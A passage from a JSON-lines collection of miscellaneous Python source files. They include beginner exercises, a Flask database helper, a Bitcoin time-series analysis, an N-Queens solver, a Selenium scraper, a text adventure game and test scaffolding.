66\n\nl = int(input(\"Digite um número: \"))\n\nif(l in [r,y,t]):\n print(\"ESTÁ contido\")\nelse:\n print(\"NÃO está contido\")\n\"\"\"\ncores = ['azul', 'amarelo', 'red', 'green', 'black', 'branco']\nwhile True:\n valor = input(\"Digite o nome de uma cor ou 0 para sair: \")\n\n if(valor == '0'):\n break\n if valor in cores:\n print(\"A cor \", valor, \"Esta cor está contida\")\n print()\n else:\n print(\"Não está contida\")","sub_path":"Python_47_pratico_in/pratico_in.py","file_name":"pratico_in.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"316455140","text":"import datetime\n\nfrom app import app_db\n\nfrom uuid import uuid4\n\n\ndef get(model, **kwargs):\n return app_db.session.query(model).filter_by(**kwargs).first()\n\n\ndef get_list(model, **kwargs):\n sort_by = kwargs.pop('sort_by', 
'created_at')\n limit = kwargs.pop('limit', None)\n desc = kwargs.pop('desc', True)\n published = kwargs.pop('published', True)\n items = app_db.session.query(model).filter_by(**kwargs)\n if published and hasattr(model, 'published'):\n items = items.filter_by(published=published)\n if hasattr(model, sort_by):\n order_by = getattr(model, sort_by)\n if desc:\n items = items.order_by(order_by.desc().nullslast())\n else:\n items = items.order_by(order_by.asc().nullslast())\n items = items.limit(limit)\n return items.all()\n\n\ndef save(obj, refresh=True):\n obj = app_db.session.merge(obj)\n app_db.session.commit()\n\n if refresh:\n app_db.session.refresh(obj)\n\n return obj\n\n\ndef publish(obj):\n update(obj, {'published': True})\n save(obj)\n\n\ndef delete(obj, hard_delete=False):\n app_db.session.delete(obj)\n app_db.session.commit()\n\n\ndef update(obj, data):\n changed = False\n\n for field, val in data.items():\n if hasattr(obj, field):\n setattr(obj, field, val)\n changed = True\n\n if changed:\n return save(obj)\n\n return obj\n\n\ndef next_uuid(model, current_item, sort_by='created_at', published=True):\n items = get_list(model, published=published, sort_by=sort_by, desc=False)\n try:\n index = [index for index, item in enumerate(items) if item.uuid == current_item.uuid][0]\n except:\n next_uuid = None\n else:\n next_uuid = items[index + 1].uuid if index < len(items) - 1 else None\n\n return next_uuid\n\n\ndef prev_uuid(model, current_item, sort_by='created_at', published=True):\n items = get_list(model, published=published, sort_by=sort_by, desc=False)\n try:\n index = [index for index, item in enumerate(items) if item.uuid == current_item.uuid][0]\n except:\n prev_uuid = None\n else:\n prev_uuid = items[index - 1].uuid if index > 0 else None\n\n return prev_uuid\n\n\ndef create(model, **kwargs):\n m = model()\n if hasattr(m, 'uuid'):\n m.uuid = str(uuid4())\n if hasattr(m, 'created_at'):\n m.created_at = datetime.datetime.utcnow()\n for k, v in kwargs.items():\n if hasattr(m, k):\n setattr(m, k, v)\n\n return save(m)\n","sub_path":"app/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585447639","text":"# -*- coding: utf-8 -*-\n\n\n# Import libraries\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom scipy import stats\nimport statsmodels.api as sm\nimport warnings\nfrom itertools import product\nfrom datetime import datetime\nimport os\n\nos.chdir(\"./data/\")\n#from scipy import pearsonr\nwarnings.filterwarnings('ignore')\nplt.style.use('seaborn-poster')\n\n# Load data\ndf = pd.read_csv('btceUSD_1-min_data_2012-01-01_to_2017-05-31.csv')\n#df = pd.read_csv('btcnCNY_1-min_data_2012-01-01_to_2017-05-31.csv') #\n#df = pd.read_csv('krakenEUR_1-min_data_2014-01-08_to_2017-05-31.csv')\n\ndf.head()\nprint(df.dtypes)\n\n#c = pd.DataFrame(columns = df.Open, index = a.columns)\n#\n#for col in c.columns:\n# for idx in c.index:\n# correl_signif = pearsonr(a[col], b[idx])\n# correl = correl_signif[0]\n# c.loc[idx, col] = correl\n# Unix-time to datetime\ndf.Timestamp = pd.to_datetime(df.Timestamp, unit='s')\n\n# Resampling to daily frequency\ndf.index = df.Timestamp\ndf = df.resample('D').mean()\n\n# Resampling to monthly frequency\ndf_month = df.resample('M').mean()\n\n# Resampling to annual frequency\ndf_year = df.resample('A-DEC').mean()\n\n# Resampling to quarterly frequency\ndf_Q = 
df.resample('Q-DEC').mean()\n\n\n# PLOTS\nfig = plt.figure(figsize=[15, 7])\nplt.suptitle('Bitcoin exchanges, mean USD', fontsize=22)\n\nplt.subplot(221)\nplt.plot(df.Weighted_Price, '-', label='By Days')\nplt.legend()\n\nplt.subplot(222)\nplt.plot(df_month.Weighted_Price, '-', label='By Months')\nplt.legend()\n\nplt.subplot(223)\nplt.plot(df_Q.Weighted_Price, '-', label='By Quarters')\nplt.legend()\n\nplt.subplot(224)\nplt.plot(df_year.Weighted_Price, '-', label='By Years')\nplt.legend()\n\n# plt.tight_layout()\nplt.show()\n\n\n\nplt.figure(figsize=[15,7])\nsm.tsa.seasonal_decompose(df_month.Weighted_Price).plot()\nprint(\"Dickey–Fuller test: p=%f\" % sm.tsa.stattools.adfuller(df_month.Weighted_Price)[1])\nplt.show()\n\n\n\n# Box-Cox Transformations\ndf_month['Weighted_Price_box'], lmbda = stats.boxcox(df_month.Weighted_Price)\nprint(\"Dickey–Fuller test: p=%f\" % sm.tsa.stattools.adfuller(df_month.Weighted_Price_box)[1])\n\n\n# Seasonal differentiation\ndf_month['prices_box_diff'] = df_month.Weighted_Price_box - df_month.Weighted_Price_box.shift(12)\nprint(\"Dickey–Fuller test: p=%f\" % sm.tsa.stattools.adfuller(df_month.prices_box_diff[12:])[1])\n\n\n# Regular differentiation\ndf_month['prices_box_diff2'] = df_month.prices_box_diff - df_month.prices_box_diff.shift(1)\nplt.figure(figsize=(15,7))\n\n# STL-decomposition\nsm.tsa.seasonal_decompose(df_month.prices_box_diff2[13:]).plot() \nprint(\"Dickey–Fuller test: p=%f\" % sm.tsa.stattools.adfuller(df_month.prices_box_diff2[13:])[1])\n\nplt.show()\n\n\n# Initial approximation of parameters using Autocorrelation and Partial Autocorrelation Plots\nplt.figure(figsize=(15,7))\nax = plt.subplot(211)\nsm.graphics.tsa.plot_acf(df_month.prices_box_diff2[13:].values.squeeze(), lags=48, ax=ax)\nax = plt.subplot(212)\nsm.graphics.tsa.plot_pacf(df_month.prices_box_diff2[13:].values.squeeze(), lags=48, ax=ax)\nplt.tight_layout()\nplt.show()","sub_path":"btc/arima_example.py","file_name":"arima_example.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"477839549","text":"# Python program to solve N Queen Problem using backtracking\n\nglobal N\nN = 4\n\n\n# A utility function to check if a queen can be placed on board[row][col]. 
Note that this\n# function is called when \"col\" queens are already placed in columns from 0 to col - 1.\n# So we need to check only left side for attacking queens\n\n\ndef is_safe(board, row, col):\n # Check this row on left side\n for i in range(col):\n if board[row][i] == 1:\n return False\n\n # Check upper diagonal on left side\n for i, j in zip(range(row, -1, -1), range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n\n # Check lower diagonal on left side\n for i, j in zip(range(row, N, 1), range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n\n return True\n\n\ndef solve_n_queen(board, col):\n # base case: If all queens are placed then return true\n if col >= N:\n return True\n\n # Consider this column and try placing this queen in all rows one by one\n for row in range(N):\n\n if is_safe(board, row, col):\n # Place this queen in board[row][col]\n board[row][col] = 1\n\n # recur to place rest of the queens\n if solve_n_queen(board, col + 1):\n return True\n\n # If placing queen in board[row][col] doesn't lead to a solution, then remove the queen from board[row][col]\n board[row][col] = 0\n\n # if the queen can not be placed in any row in this column col then return false\n return False\n\n\ndef solve_NQ():\n board = [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0]\n ]\n\n if not solve_n_queen(board, 0):\n print(\"Solution does not exist\")\n return False\n\n print(board)\n return True\n\n\nsolve_NQ()\n","sub_path":"back_tracking/N_queen-problem.py","file_name":"N_queen-problem.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"80804636","text":"import numpy as np\nfrom rlberry.envs.benchmarks.ball_exploration import PBall2D\n\n\np = 5\nA = np.array([\n [1.0, 0.1],\n [-0.1, 1.0]\n]\n)\n\nreward_amplitudes = np.array([1.0, 0.5, 0.5])\nreward_smoothness = np.array([0.25, 0.25, 0.25])\n\nreward_centers = [\n np.array([0.75 * np.cos(np.pi / 2), 0.75 * np.sin(np.pi / 2)]),\n np.array([0.75 * np.cos(np.pi / 6), 0.75 * np.sin(np.pi / 6)]),\n np.array([0.75 * np.cos(5 * np.pi / 6), 0.75 * np.sin(5 * np.pi / 6)])\n]\n\naction_list = [0.1 * np.array([1, 0]),\n -0.1 * np.array([1, 0]),\n 0.1 * np.array([0, 1]),\n -0.1 * np.array([0, 1])]\n\nenv = PBall2D(p=p, A=A,\n reward_amplitudes=reward_amplitudes,\n reward_centers=reward_centers,\n reward_smoothness=reward_smoothness,\n action_list=action_list)\n\nenv.enable_rendering()\n\nfor ii in range(100):\n env.step(1)\n env.step(3)\n\nenv.render()\n","sub_path":"examples/demo_pball.py","file_name":"demo_pball.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"466744078","text":"class Data(object):\n def __init__(self):\n self.catchable_pokemon = []\n self.nearby_pokemon = []\n self.wild_pokemon = []\n self.decimated_spawn_points = []\n self.spawn_points = []\n self.fort_summaries = []\n self.forts = []\n\n\nclass Player(object):\n def __init__(self, latitude, longitude, altitude):\n self.lat = latitude\n self.lon = longitude\n self.alt = altitude\n","sub_path":"utils/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"505466356","text":"import os\nimport io\nimport tarfile\n\n\ndef create_tar(path):\n fileobj = io.BytesIO()\n tar = tarfile.open(mode='w:gz', fileobj=fileobj)\n\n for root, dirs, files in 
os.walk(path):\n for fn in files:\n p = os.path.join(root, fn)\n\n # remove one more character to remove trailing slash\n arcname = p[p.find(path)+len(path)+1:]\n\n if not arcname.startswith('.nova/config'):\n tar.add(p, arcname=arcname)\n\n tar.close()\n return fileobj\n\n\ndef extract_tar(fileobj, path):\n fileobj.seek(0)\n tar = tarfile.open(mode='r:gz', fileobj=fileobj)\n tar.extractall(path)\n tar.close()\n","sub_path":"nova/memtar.py","file_name":"memtar.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"648609191","text":"import os\nfrom setuptools import setup, find_packages\n\ntry:\n import pypandoc\n long_description = pypandoc.convert('README.md', 'rst')\nexcept:\n long_description = \"\"\"\n Forked from https://github.com/FaBoPlatform/FaBo9AXIS-MPU9250-Python .\n Changes are meant to enable Python 3 support. \n Original package is called `FaBo9Axis_MPU9250`.\n Author of original package: FaBo\"\"\"\n\nclassifiers = ['Development Status :: 4 - Beta',\n 'Operating System :: POSIX :: Linux',\n 'License :: OSI Approved :: Apache Software License',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3',\n 'Topic :: Software Development',\n 'Topic :: System :: Hardware']\n\nsetup(\n name='FaBo9Axis_MPU9250_Python3',\n version='1.0.3',\n author='RandomUser1',\n description=\"Fork of `FaBo9Axis_MPU9250`. This is a library for the FaBo 9AXIS I2C Brick.\",\n long_description=long_description,\n url='https://github.com/piotrek-k/FaBo9AXIS-MPU9250-Python3',\n license='Apache License 2.0',\n classifiers=classifiers,\n packages=find_packages(),\n install_requires=[\n 'smbus'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"502329069","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n'''\nProblem: there is an array that is already sorted.\nRead in a number and insert it into the array so that the original ordering is preserved.\n\nAnalysis: first check whether the number is greater than the last element;\notherwise find the position in the middle where it belongs, and shift every element after it back by one position.\n'''\n# Method 1\nL = [1, 2, 3, 4, 5]\na = 2\nif a >= L[len(L) - 1]:\n L.append(a)\n print(L)\nelif a <= L[0]:\n L.insert(0, a)\n print(L)\nelse:\n # compare against the elements, not the loop index\n for i in range(len(L) - 1):\n if a >= L[i] and a <= L[i + 1]:\n L.insert(i + 1, a)\n print(L)\n break\n\n# Method 2\nL=[1,3,5,7,8]\na=2\nL.append(a)\nL.sort()\nprint(L)\n","sub_path":"python-039.py","file_name":"python-039.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"519119278","text":"\"\"\"\nModule defines Scraper Base Class\n\"\"\"\nfrom .form_instructions import FormInstructions, ValueClass\nfrom selenium.webdriver import Chrome, Firefox\nfrom selenium.webdriver.support.ui import Select\nfrom toolz import curry\nfrom typing import List, Union\nfrom bs4 import BeautifulSoup\n\n#class ValueClass(NamedTuple):\n# xpath: str\n# values: Union[str, Sequence[str]]\n# form_element_type: str\n# allow_multiple: bool\n\ndef _scrape_make_soup(html_:str, storage_path:str)->BeautifulSoup:\n soup = BeautifulSoup(html_)\n return soup\n\n\nclass Scraper:\n\n def __init__(self, url:str, instructions: FormInstructions, browser:Union[Chrome, Firefox]):\n self._instructions = instructions\n self._form_ids_base = instructions.get_form_ids_values()\n self._total_instr = []\n self.browser = browser\n self.url = url\n self.final_instruction_plan = self._build_exec_plan()\n\n def _get_single_entries_for_form(self)->List[ValueClass]:\n return [v for v 
in self._form_ids_base if isinstance(v.values, str) or v.allow_multiple is True]\n\n def _get_multiple_entries_for_form(self):\n return [v for v in self._form_ids_base if v.allow_multiple is False]\n\n def _expand_value_class(self, vc:ValueClass)->List[ValueClass]:\n @curry\n def make_value_class(xpath, form_element_type, allow_multiple, values):\n return ValueClass(xpath, values, form_element_type, allow_multiple)\n\n xpath, values, form_element_type, _ = vc\n make_value = make_value_class(xpath, form_element_type, False)\n return [make_value(v) for v in values]\n\n def _merge_single_with_expanded_vc(self, sl: List[ValueClass], xl: List[ValueClass])->List[List[ValueClass]]:\n # list.extend mutates in place and returns None, so build a fresh list per expanded entry instead\n return [sl + [vc] for vc in xl]\n\n def _build_exec_plan(self):\n # Step 1 -> isolate single-value entries from the multiple-value ones\n single_entries = self._get_single_entries_for_form()\n # Step 2 -> extract multiple entries\n multiple_entries = self._get_multiple_entries_for_form()\n #TODO -> scale up if multiple single dropdowns - not a problem for now to solve\n # Step 3 -> extract to list ValueClass\n exploded_entries = self._expand_value_class(multiple_entries[0]) #TODO-> clean_up\n #Step 4 put together everything\n final_out_put = self._merge_single_with_expanded_vc(single_entries, exploded_entries)\n return final_out_put\n\n def _navigate_to_url(self):\n self.browser.get(self.url)\n\n def _populate_form(self, vcl: List[ValueClass]):\n '''Refactor'''\n# self._navigate_to_url()\n# for vc in self.final_instruction_plan[-1]:\n for vc in vcl:\n if vc.form_element_type == 'select':\n if vc.allow_multiple:\n #TODO -> build this\n pass\n else:\n element = Select(self.browser.find_element_by_xpath(vc.xpath))\n element.select_by_value(vc.values)\n #Completed form entry -> Bare bones for scenario 1\n# print(self._instructions.get_submit_id())\n# submit = self.browser.find_element_by_xpath(self._instructions.get_submit_id())\n# submit.click()\n html_ = self.browser.page_source\n #scrape_table(html)\n\n def collect_base_htmls(self):\n import time\n self._navigate_to_url()\n print('navigated')\n all_html = []\n for vc in self.final_instruction_plan:\n print(vc, type(vc))\n print(self.browser.current_url)\n assert self.url == self.browser.current_url\n self._populate_form(vc)\n submit = self.browser.find_element_by_xpath(self._instructions.get_submit_id())\n submit.click()\n time.sleep(2)\n #TODO Terrible Code -> need more resiliency... 
wrap in retry decorator -> think how to write results one at a time\n if self.url != self.browser.current_url:\n print('catching my breath')\n time.sleep(5)\n self.browser.back()\n time.sleep(2)\n self._populate_form(vc)\n submit = self.browser.find_element_by_xpath(self._instructions.get_submit_id())\n submit.click()\n time.sleep(2)\n html_ = self.browser.page_source\n all_html.append(html_) #TODO would like to capture dates\n print(self.url)\n time.sleep(5) #Site must be throttled -> Wait between each call\n self.browser.back()\n return all_html\n\n def __str__(self):\n return 'a_string' #TODO\n\n","sub_path":"screenscraping/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"118361250","text":"firstList = [12,3,53,2,33,55]\r\nsecondList = [6,4,76,33,66,77]\r\n\r\n#declare a third list to store the results\r\nthirdList = []\r\n\r\nfor num in firstList:\r\n if num % 2 != 0:\r\n thirdList.append(num)\r\n\r\nfor num in secondList:\r\n if num % 2 == 0:\r\n thirdList.append(num)\r\n\r\nprint(\"Third list is : \", thirdList)","sub_path":"python/activity_9.py","file_name":"activity_9.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"370796865","text":"# coding=utf-8\n__author__ = 'Tang'\n\nimport lib.xmltodict as xmltodict\nimport unittest\n\n\nclass PatentFileException(Exception):\n \"\"\"Raised when file is empty\"\"\"\n def __init__(self, filename):\n self.filename = filename\n\n\nclass Patent:\n \"\"\"Patent data as extracted from XML\"\"\"\n def __init__(self, filename):\n with open(filename, 'r') as infile:\n data = infile.read().replace('\\n', '')\n if data is not None:\n temp_dict = xmltodict.parse(data)\n self.dict = dict()\n for each in temp_dict['doc']['str']:\n if u'@name' in each.keys() and u'#text' in each.keys():\n self.dict[each[u'@name']] = each[u'#text']\n else:\n raise PatentFileException(filename)\n\n def get_data(self):\n return self.dict\n\n\nclass TestPatentClass(unittest.TestCase):\n\n def test_read_patent(self):\n with open(\"tests/json/patent_class_test1.txt\", 'r') as infile:\n output = infile.read().replace('\\n', '')\n p = Patent(\"corpus/patsnap-corpus/EP0049154B2.xml\")\n self.assertEqual(output, str(p.get_data()))\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"patent.py","file_name":"patent.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"453234765","text":"#!/usr/bin/python\n__author__ = \"Vishal Jasrotia. 
Stony Brook University\"\n__copyright__ = \"\"\n__license__ = \"GPL\"\n__version__ = \"1.0\"\n__maintainer__ = \"Vishal Jasrotia\"\n__email__ = \"jasrotia.vishal@stonybrook.edu\"\n__status__ = \"\"\n\nimport os, sys\nfrom linklist import Node\n\n\na = Node(1 ,None)\nb = Node(2 ,a)\nc = Node(3 ,b)\nd = Node(4 ,c)\ne = Node(5 ,d)\nf = Node(6 ,e)\ng = Node(7 ,f)\nh = Node(8 ,g)\ni = Node(9 ,h)\nj = Node(10 ,i)\nk = Node(11 ,j)\nl = Node(12 ,k)\nm = Node(13 ,l)\nn = Node(14 ,m)\n\n\n#create circle \na.setNext(h)\n\nprint(a)\nslowtemp = n\nfasttemp = n\n#detect and print \nwhile fasttemp is not None and fasttemp.getNext() is not None :\n sys.stdout.write(\"%d\"%slowtemp.getData())\n slowtemp = slowtemp.getNext()\n fasttemp = fasttemp.getNext().getNext()\n if slowtemp is not None:\n sys.stdout.write(\" -> \")\n\n if slowtemp == fasttemp:\n print(\"cycle detected in system at %d.\"%slowtemp.getData())\n break\n\nslowtemp = n\nwhile slowtemp is not None and fasttemp is not None:\n slowtemp = slowtemp.getNext()\n fasttemp = fasttemp.getNext()\n if slowtemp ==fasttemp:\n print(\"cycle starts from node with data %d\"%fasttemp.getData())\n break\n\n","sub_path":"Chapter 3 linklist/floycyclefindalgo.py","file_name":"floycyclefindalgo.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"437350345","text":"import numpy as np\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\nimport rlkit.torch.pytorch_util as ptu\nimport torch\nfrom gym.envs.mujoco import PusherEnv, AntEnv, HalfCheetahEnv, HumanoidStandupEnv\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom torch.optim import Adam\nfrom torch import nn\n\nfrom rlkit.torch.core import PyTorchModule\nfrom rlkit.torch.networks import Mlp, OuterProductFF\n\nplt.ion()\n\n# env = PusherEnv()\n# joint_slice = slice(None, 7)\n# joint_name = 'tips_arm'\n\nenv = HalfCheetahEnv()\njoint_slice = slice(None, 7)\njoint_name = 'ffoot'\n\n# env = HumanoidStandupEnv()\n# joint_slice = slice(None, None)\n# joint_name = 'right_foot'\n\n# env = AntEnv()\n# joint_slice = slice(2, 13)\n# joint_name = 'aux_4'\n\nN_PATHS = 1000\nN_PATHS_TEST = N_PATHS\nPATH_LENGTH = 10\nN_EPOCHS = 50\n\n\ndef generate_data(n_paths, path_length):\n joint_angles = []\n # jacobians = []\n states = []\n actions = []\n next_states = []\n for i in range(n_paths):\n state = env.reset()\n # tip_arm_jac = env.sim.data.get_body_jacp(joint_name)\n for _ in range(path_length):\n joint_angles.append(state[joint_slice])\n # jacobians.append(tip_arm_jac)\n states.append(state)\n action = env.action_space.sample()\n state, *_ = env.step(action)\n actions.append(action)\n next_states.append(state)\n # tip_arm_jac = env.sim.data.get_body_jacp(joint_name)\n # return np.array(joint_angles), np.array(jacobians)\n return (\n np.hstack((np.array(states), np.array(actions))),\n np.array(next_states) - np.array(states)\n )\n\n\ntrain_x_np, train_y_np = generate_data(N_PATHS, PATH_LENGTH)\ntest_x_np, test_y_np = generate_data(N_PATHS_TEST, PATH_LENGTH)\ntrain_x = ptu.np_to_var(train_x_np)\ntrain_y = ptu.np_to_var(train_y_np)\ntest_x = ptu.np_to_var(test_x_np)\ntest_y = ptu.np_to_var(test_y_np)\n\ntrain_dataset = TensorDataset(\n ptu.FloatTensor(train_x_np),\n ptu.FloatTensor(train_y_np),\n)\nin_dim = train_x_np[0].size\nout_dim = train_y_np[0].size\ndataloader = DataLoader(train_dataset, batch_size=32, shuffle=True)\n\n\ndef train_network(net, title):\n train_losses = []\n test_losses = []\n 
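# epoch indices used as the x-axis of the live loss plot\n 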
times = []\n\n optimizer = Adam(net.parameters(), lr=1e-3)\n criterion = nn.MSELoss()\n\n for i in range(N_EPOCHS):\n for i_batch, sample_batched in enumerate(dataloader):\n x, y = sample_batched\n x = ptu.Variable(x)\n y = ptu.Variable(y)\n y_hat = net(x)\n\n loss = criterion(y_hat, y)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n y_hat = net(test_x)\n test_loss = float(criterion(y_hat, test_y))\n test_losses.append(test_loss)\n\n y_hat = net(train_x)\n train_loss = float(criterion(y_hat, train_y))\n train_losses.append(train_loss)\n\n times.append(i)\n plt.gcf().clear()\n plt.plot(times, train_losses, '--')\n plt.plot(times, test_losses, '-')\n plt.title(title)\n plt.draw()\n plt.pause(0.05)\n print(title)\n print(\"\\tfinal train loss: {}\".format(train_loss))\n print(\"\\tfinal test loss: {}\".format(test_loss))\n\n\nclass JacobianNet(PyTorchModule):\n def __init__(\n self,\n hidden_sizes,\n output_size,\n input_size,\n init_w=3e-3,\n hidden_init=ptu.fanin_init,\n b_init_value=0.,\n ):\n super().__init__()\n\n self.input_size = input_size\n self.output_size = output_size\n self.fcs = []\n self.gates = []\n self.layer_norms = []\n in_size = input_size\n\n for i, next_size in enumerate(hidden_sizes):\n fc = nn.Linear(in_size, next_size)\n hidden_init(fc.weight)\n fc.bias.data.fill_(b_init_value)\n self.__setattr__(\"fc{}\".format(i), fc)\n self.fcs.append(fc)\n\n fc = nn.Linear(in_size, next_size)\n hidden_init(fc.weight)\n fc.bias.data.fill_(b_init_value)\n self.__setattr__(\"gate{}\".format(i), fc)\n self.gates.append(fc)\n\n in_size = next_size\n\n self.last_fc = nn.Linear(in_size, output_size)\n self.last_fc.weight.data.uniform_(-init_w, init_w)\n self.last_fc.bias.data.fill_(0)\n\n def forward(self, input, return_preactivations=False):\n h = input\n z = input\n for fc, gate in zip(self.fcs, self.gates):\n z = torch.sin(gate(z))\n h = fc(h) * z\n return self.last_fc(h)\n\n\ndef num_params(net):\n return nn.utils.parameters_to_vector(net.parameters()).shape[0]\n\nmean_y = np.mean(test_y_np, axis=0)\nprint(\"Mean y\", mean_y)\nprint(\"Constant error\", np.mean((test_y_np - mean_y)**2))\n\nplt.figure()\nmlp = Mlp(hidden_sizes=[100, 100], output_size=out_dim, input_size=in_dim)\n\nmlp_n_params = num_params(mlp)\n\nh_size = 100\njac_net = JacobianNet(hidden_sizes=[h_size, h_size], output_size=out_dim,\n input_size=in_dim)\n# keep # paramers ~ same\nwhile num_params(jac_net) > mlp_n_params:\n h_size -= 5\n jac_net = JacobianNet(hidden_sizes=[h_size, h_size], output_size=out_dim,\n input_size=in_dim)\nprint(\"jac_net h_size:\", h_size)\n\nlinear_net = Mlp(hidden_sizes=[], output_size=out_dim, input_size=in_dim)\n\n\nsin_mlp = Mlp(hidden_sizes=[100, 100], output_size=out_dim, input_size=in_dim,\n hidden_activation=torch.sin)\ntanh_mlp = Mlp(hidden_sizes=[100, 100], output_size=out_dim, input_size=in_dim,\n hidden_activation=torch.tanh)\nplt.figure()\ntrain_network(mlp, \"mlp [100, 100]\")\nplt.figure()\ntrain_network(jac_net, \"jac [{h_size}, {h_size}]\".format(h_size=h_size))\n# plt.figure()\n# train_network(linear_net, \"linear\")\n# plt.figure()\n# train_network(sin_mlp, \"sin [100, 100]\")\n# plt.figure()\n# train_network(tanh_mlp, \"tanh [100, 100]\")\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport ipdb; ipdb.set_trace()\n","sub_path":"experiments/vitchyr/one_offs/jacobian_regression.py","file_name":"jacobian_regression.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 
+{"seq_id":"261302806","text":"import json\nimport random\nfrom Functions.Attack import attack\nfrom Functions.Explore import explore\nfrom Functions.DescribeLocation import describelocation\nfrom Functions.Trapped import trapped\nfrom Functions.Movement import movecmd\n\n\ndef loadjson():\n with open('Dependents/player.json', 'r') as f: # Opens the player.json\n player = json.load(f)\n return player\n\n\ndef savejson():\n with open('Dependents/player.json', 'w') as f: # Saves any changes to localplayer to player.\n f.write(json.dumps(localplayer))\n\n\ndef export(x, y):\n with open(x + y +\".json\", 'w') as f: # Saves any changes to localplayer to player.\n f.write(json.dumps(localplayer))\n\nwith open('Dependents/encounters.json') as encounters:\n encounters = json.loads(encounters.read())\n\n\ncommands = (\"Explore\", \"Go\", \"Heal\", \"Inventory\", \"Exit\") # Available commands for the player to use.\nbreak_line = ('-' * 100)\n\n\nlocalplayer = loadjson()\nturn = 1\nloopx = True\nif turn <= 1:\n while loopx:\n if localplayer[\"player_health\"] <= 0:\n break\n print(\"Turn: \" + str(turn) + \"\\n\")\n describelocation()\n action = input(\"Input your command (\" + \", \".join(commands) + \"): \").lower().split()\n print('-' * 100)\n if any('explore' in s for s in action): # Explore command (Random encounter)\n explore()\n else: # Checks to see if there's any traps in the area after the explore function is used. If it isn't, the player is damaged.\n trapped()\n if any('go' in s for s in action): # Movement command (Sends player in the direction they input)\n action.remove('go')\n where = \"\".join(action)\n currentstate = localplayer[\"playerstate\"]\n if where in (\"north\", \"south\", \"east\", \"west\"):\n attacked = random.randint(1, 100)\n if attacked == 1:\n attack(\"Random\")\n else:\n localplayer[\"playerstate\"] = movecmd(where)\n if localplayer[\"playerstate\"] in encounters:\n status = attack(\"Encounter\")\n if status == \"Flee\":\n localplayer[\"playerstate\"] = currentstate\n elif status == \"Win\":\n from Functions.RewardPlayer import rewardplayer\n print(\"\\n\"\"You found a \" + rewardplayer() + \"!\" + \"\\n\"\"You put it away safely in your inventory\"\"\\n\")\n print(str(break_line))\n input(\"Press enter key to continue.\")\n del encounters[localplayer[\"playerstate\"]]\n else:\n print(\"\\n\"\"You have been defeated.\")\n localplayer[\"playerstate\"] = currentstate\n break\n else:\n print(\"Invalid selection. Please choose from North, South, East or West.\")\n # PUT NEW SHIT HERE:\n elif any('inventory' in s for s in action):\n from Functions.Inventory import inventory\n inventory()\n elif any('heal' in s for s in action): # Heal command (Heals player to full health, but takes as many turns as their health difference, random encounters can occur\n from Functions.PlayerHeal import playerheal\n playerheal()\n elif any('exit' in s for s in action): # Exports the player file\n location = input(\"Where do you want to save your file? \")\n name = input(\"What would you like to save your file as? 
\")\n export(location, name)\n break\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"475046790","text":"import os\nimport responses\nfrom unittest import mock\nfrom unittest import skipUnless\nfrom unittest.mock import patch, MagicMock\n\nfrom nextcode import jupyter\nfrom nextcode.exceptions import InvalidToken, InvalidProfile, ServerError\nfrom nextcode.services.query.exceptions import MissingRelations, QueryError\nfrom tests import BaseTestCase, REFRESH_TOKEN, AUTH_RESP, AUTH_URL\nfrom tests.test_query import ROOT_URL, ROOT_RESP\ntry:\n import pandas as pd\n from pandas import DataFrame\n PANDAS_INSTALLED = True\nexcept ModuleNotFoundError:\n PANDAS_INSTALLED = False\n\n\ndef setup_responses():\n responses.add(responses.POST, AUTH_URL, json=AUTH_RESP)\n responses.add(responses.GET, ROOT_URL, json=ROOT_RESP)\n\n\nclass JupyterTest(BaseTestCase):\n @responses.activate\n def setUp(self):\n super(JupyterTest, self).setUp()\n setup_responses()\n self.magics = 